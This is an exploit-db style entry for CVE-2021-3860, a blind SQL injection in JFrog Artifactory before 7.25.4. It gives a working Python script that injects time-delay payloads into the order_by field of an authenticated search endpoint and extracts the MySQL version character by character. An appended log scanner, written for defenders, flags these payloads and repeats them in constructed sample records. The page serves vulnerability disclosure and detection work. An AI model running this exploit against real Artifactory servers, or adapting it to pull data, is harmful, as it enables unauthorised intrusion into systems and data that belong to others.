JFrog Artifactory < 7.25.4 - Blind SQL Injection

Published: 19 Feb 2024 00:00:00
Reported by: ardr
Type: exploitdb
Source: www.exploit-db.com

JFrog Artifactory < 7.25.4 - Blind SQL Injection, Exploit for CVE-2021-3860

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| 0day.today | JFrog Artifactory < 7.25.4 - Blind SQL Injection Exploit | 19 Feb 2024 00:00 | zdt |
| CNNVD | Jfrog JFrog Artifactory SQL injection vulnerability | 20 Dec 2021 00:00 | cnnvd |
| CVE | CVE-2021-3860 | 20 Dec 2021 00:00 | cve |
| Cvelist | CVE-2021-3860 | 20 Dec 2021 00:00 | cvelist |
| EUVD | EUVD-2021-27097 | 7 Oct 2025 00:30 | euvd |
| NVD | CVE-2021-3860 | 20 Dec 2021 22:15 | nvd |
| OSV | BIT-ARTIFACTORY-2021-3860 | 6 Mar 2024 10:52 | osv |
| OSV | CVE-2021-3860 | 20 Dec 2021 22:15 | osv |
| Packet Storm | JFrog Artifactory SQL Injection | 19 Feb 2024 00:00 | packetstorm |
| Prion | Sql injection | 20 Dec 2021 22:15 | prion |

Code

# Exploit Title: artifactory low-privileged blind sql injection
# Google Dork:
# Date: 
# Exploit Author: ardr
# Vendor Homepage: https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection
# Software Link: https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection
# Version: JFrog Artifactory prior to 7.25.4
# Tested on: MySQL
# CVE : CVE-2021-3860

import requests, string, time
from sys import stdout,exit
import warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# written by 75fc58fa86778461771d2ff7f68b28259e97ece9bf6cd8be227c70e6a6140314c97d3fdac30b290c6b10d3679c5ba890635a1ca6fa23c83481dfc1257cd062fd
# old script for CVE-2021-3860
# log into artifactory with any user.  there must be populated data in the system.  a fresh install will not work.
# you will need to be able to capture a valid request to the below endpoint in order to run this script.
# once captured, replace the cookies and headers below


warnings.simplefilter('ignore',InsecureRequestWarning)


session = requests.session()
base = input("Please enter the base url: ")
url = f"{base}/ui/api/v1/global-search/bundles/received?$no_spinner=true"
# headers = Replace this with captured headers from the above endpoint 
pos = 1
version = ""  # characters of VERSION() recovered so far
# cookies = Replace this with captured cookies from the above endpoint 


while True:
    for i in string.digits + '.':
        data={"after": "", "before": "", "direction": "asc", "name": "*", "num_of_rows": 100, "order_by": f"(select*from(select((CASE WHEN (MID(VERSION(),{pos},1) = '{i}') THEN SLEEP(5) ELSE 4616 END)))a)"}
        start = time.time()
        r = session.post(url, headers=headers, cookies=cookies, json=data, verify=False)
        request_time = time.time() - start
        if request_time > 5:
            version += i
            pos += 1
            stdout.write(i)
            stdout.flush()
            break
        if len(version) >= 6:
            stdout.write("\n")
            print(f"Version found: MySQL {version}")
            exit(0)
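
As an added example (not part of the original exploit-db entry and not JFrog's code), a defender-side check for this injection: it classifies the order_by value of POSTs to the endpoint used above and marks requests slow enough to match the SLEEP(5) timing oracle. The log record layout (method, path, body, duration) and the rule that a legitimate sort key is a bare identifier are assumptions.

```python
import json
import re

TARGET_PATH = "/ui/api/v1/global-search/bundles/received"  # endpoint from the script above
# Assumption: a legitimate sort key is a single bare column identifier.
PLAIN_IDENTIFIER = re.compile(r"[A-Za-z_][A-Za-z0-9_]{0,63}")
# SQL constructs that have no place in a sort key.
SQL_TOKENS = re.compile(r"\b(select|sleep|benchmark|case|when|union|mid|version)\b|[()'\";*]", re.I)

def classify_order_by(value):
    """Return 'ok', 'malformed' or 'sqli' for an order_by value."""
    if value is None or value == "":
        return "ok"
    if not isinstance(value, str):
        return "malformed"
    if PLAIN_IDENTIFIER.fullmatch(value):
        return "ok"
    return "sqli" if SQL_TOKENS.search(value) else "malformed"

def scan(records, slow_seconds=5.0):
    """Return (line_no, verdict, slow) for each suspicious POST to TARGET_PATH."""
    findings = []
    for n, raw in enumerate(records, 1):
        rec = json.loads(raw)
        if rec.get("method") != "POST" or not rec.get("path", "").startswith(TARGET_PATH):
            continue
        try:
            body = json.loads(rec.get("body") or "{}")
        except json.JSONDecodeError:
            body = None
        verdict = classify_order_by(body.get("order_by")) if isinstance(body, dict) else "malformed"
        if verdict != "ok":
            findings.append((n, verdict, rec.get("duration", 0) >= slow_seconds))
    return findings

def _rec(method, path, order_by, duration):
    # Builds one constructed log record; the field names are hypothetical.
    body = json.dumps({"name": "*", "num_of_rows": 100, "order_by": order_by})
    return json.dumps({"method": method, "path": path, "body": body, "duration": duration})

PAYLOAD = "(select*from(select((CASE WHEN (MID(VERSION(),1,1) = '{}') THEN SLEEP(5) ELSE 4616 END)))a)"
SAMPLE_LOG = [  # constructed sample, not real traffic
    _rec("POST", TARGET_PATH + "?$no_spinner=true", "name", 0.12),
    _rec("POST", TARGET_PATH + "?$no_spinner=true", PAYLOAD.format("8"), 5.21),
    _rec("POST", TARGET_PATH + "?$no_spinner=true", PAYLOAD.format("7"), 0.09),
    _rec("GET", "/constructed/other/path", "name", 0.03),
    _rec("POST", TARGET_PATH, "name desc", 0.10),
]
```

A burst of "sqli" findings from one session in which only some requests are slow is the signature of the character-by-character loop above; the same identifier check applied server-side rejects the payload before it reaches the ORDER BY clause.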

Scores (current as of 19 Feb 2024 00:00):
Vulners AI Score: 8.9 (High risk)
CVSS 2: 6.5
CVSS 3.1: 8.8
EPSS: 0.00247